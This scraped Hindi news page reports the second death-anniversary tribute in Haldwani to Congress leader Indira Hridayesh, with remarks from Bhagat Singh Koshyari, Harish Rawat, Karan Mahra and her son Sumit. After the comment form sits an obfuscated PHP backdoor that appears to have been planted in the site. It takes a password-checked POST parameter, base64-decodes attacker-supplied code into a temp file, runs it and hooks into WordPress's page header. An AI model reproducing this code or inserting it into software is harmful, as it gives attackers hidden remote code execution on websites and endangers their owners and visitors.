ब्रेकिंग(हल्द्वानी)दूसरी पुण्यतिथि पर याद की गई स्वर्गीय इंदिरा हृदयेश. हल्द्वानी ने दी उन्हें श्रद्धांजलि.पहुंचे दिग्गज…..

Uttarakhand Press, 14 June 2023: हल्द्वानी: शहर में कांग्रेस के वरिष्ठ नेताओं का जमावड़ा रहा. मौका था पार्टी की दिग्गज नेता रहीं स्वर्गीय इंदिरा हृददेश की दूसरी पुण्यतिथि का. इस मौके पर महाराष्ट्र के पूर्व राज्यपाल भगत सिंह कोश्यारी, पूर्व मुख्यमंत्री हरीश रावत, कांग्रेस प्रदेश अध्यक्ष करण माहरा, नेता प्रतिपक्ष यशपाल आर्य, पूर्व विधानसभा अध्यक्ष गोविन्द सिंह कुंजवाल मौजूद रहे.

भगत सिंह कोश्यारी ने इंदिरा हृदयेश के काम याद दिलाए: इंदिरा हृदयेश की पुण्यतिथि पर उत्तराखंड के नेताओं ने दलगत राजनीति से उठकर ये संदेश दिया कि भले ही राजनीतिक फ्रंट अलग हों, लेकिन सुख-दुख में वो साथ हैं. इस दौरान भगत सिंह कोश्यारी ने कहा कि स्वर्गीय इंदिरा हृदयेश के साथ उनकी कई यादें जुड़ी हुई हैं. हकीकत तो यह है कि इंदिरा हृदयेश ने हमेशा दलगत राजनीति से उठकर राज्य के विकास के लिए काम किया.

करन माहरा ने इंदिरा हृदयेश को ऐसे किया याद: कांग्रेस के प्रदेश अध्यक्ष करण माहरा ने कहा कि इंदिरा हृदयेश एक विजनरी पर्सनालिटी थीं. उन्होंने हमेशा राज्य के, गांव के विकास के लिए कार्य योजना बनाई. करण माहरा ने कहा कि आज हमें जरूरत है कि हम इंदिरा हृदयेश के अधूरे सपनों को पूरा करें और उसे आगे बढ़ाने का काम करें.

हरीश रावत ने इंदिरा हृदयेश के साथ की यादें साझा कीं: उत्तराखंड के पूर्व मुख्यमंत्री हरीश रावत ने इंदिरा हृदयेश के साथ रही अपनी कुछ यादों को साझा किया. उन्होंने कहा कि स्वर्गीय इंदिरा हृदयेश और हरीश रावत ने राज्य के हित के लिए साथ में संघर्ष किया. हरीश रावत ने कहा कि वह संपूर्ण और दृढ़ व्यक्तित्व की नेता थीं. उन्होंने राज्य के लिए अपना सब कुछ समर्पित कर दिया.

इंदिरा के बेटे सुमित हृदयेश ने लिया ये प्रण: स्थानीय विधायक और इंदिरा हृदयेश के पुत्र सुमित हृदयेश ने कहा कि वो अपनी मां के छोड़े गए अधूरे कार्यों को पूरा करेंगे. सुमित ने कहा कि मां इंदिरा हृदयेश से ही उनमें राजनीतिक समझ पैदा हुई. राजनीतिक समझ आने के बाद उन्हें महसूस हुआ कि एक सच्चे राजनेता का कार्य आम जन के लिए अपना जीवन समर्पित करना होता है.

Read Previous

कैबिनेट मंत्री धन सिंह रावत ने रेलवे को लोगों जल्द मुआवजा देने के दिए निर्देश अतिक्रमण पर दिखाई सख्ती

Read Next

मनी लॉन्ड्रिंग केस में तमिलनाडु के बिजली मंत्री गिरफ्तार, ईडी की कार्रवाई के दौरान रो पड़े सेंथिल बालाजी

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}